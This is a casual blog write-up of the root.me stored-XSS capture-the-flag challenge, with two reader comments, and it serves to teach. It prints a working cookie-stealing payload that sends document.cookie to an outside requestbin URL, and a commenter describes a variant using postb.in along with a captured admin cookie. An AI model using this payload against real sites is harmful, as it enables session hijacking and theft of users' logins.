root.me – Web/Client: XSS – Stored 1

2
Hello again, pepol

I’m alive and doing stuffs. Tis another task I have to post which no one probably will see but meh.

I got this challenge from a certain website, root.me. I’ll put it at the reference place becoz that particular place is hella cool that I want to write more stuffs.

First, it’s a stored XSS challenge so u kno what to do. Basically, you’ll get something by inputting some kind of Java script but it won’t pop out like the usual XSS because stuffs.

Okay, firstable, since it’s stored, then we need something to make those things, which are stored, showed up on our screen. In behalf of that case, I foundĀ  requestbin. Do you know what’s that? Haha, fool, me neither. Apparently that link will generate us some sort of link which will show us things as we request. I’ll show you later.

Okay, let’s generate that link.

 

 

Ye, ye. I’m not a robot. Click on that “Create a Requestbin” and moving on.

That’s the link. Keep it and we’ll go to the next stage.

Okay, we get this comment posting web.

What we wanna do is input the classic document.cookie java script but add our link.

Le me help you. Copas this: <script>document.write(“<img src=’your host url?=”+document.cookie+”‘></img>”);</script>

In our case, I’ll go with <script>document.write(“<img src=’https://requestb.in/122lf8z1?=”+document.cookie+”‘></img>”);</script>

Let’s input those stuffs.

Input something to the title.

Send it and we’ll see an icon of a corrupted image at the posted message section since we posted it as image before.

 

Ye, ye. Leaking solution on internet is forbidden. I have no choice. Forgive me, okay.

Okay let’s go back to requestbin.

See that pink circle next to our small link? Click that. We’ll go to this page:

woot!~ OMAGAD OMAGAD, WE GET THE ADMIN COOKIE HAHAHAHAHAHAHA

If you haven’t got it already, keep clicking on that pink circle. It will keep sending requests until we get the cookie. //nom nom

Let’s input.

Send

This is what satisfaction looks like

Reference: 
https://www.youtube.com/watch?v=tZcHyaMR3oc
http://winnierusli.blog.binusian.org/2018/03/02/what-the-heck-is-xss-stored/ 

Used     : 
https://requestb.in/

Challenge: 
https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stored-1

PS: I'm a noob. So sorry if I can't satisfy your confusion over things but feel free to ask. 
I don't know will I be able to answer tho.

 

2 Comments


  1. thanksa lot man..you are really nice..thanks again

    Reply

  2. Thank for your best solution I had found, I stuck at how to send admin payload after getting it, I had research on Xmlhttprequest, but it didn’t work.
    At this moment, Requestbin may not work for me, I use postb.in instead. I had changed your payload a little bit because your not works anymore – at least for me. It was changed “?=” to “/”

    document.write(“”);

    I’m not going to post the script with script tag, your server may filter it and you may not read. Here is the result: GET /KOszrLM1/ADMIN_COOKIE%3DNkI9qe4cdLIO2P7MIsWS8ofD6

    The funest thing is root-me replies request slowly, sometime I worry about my sollution, did I make mistake :v

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *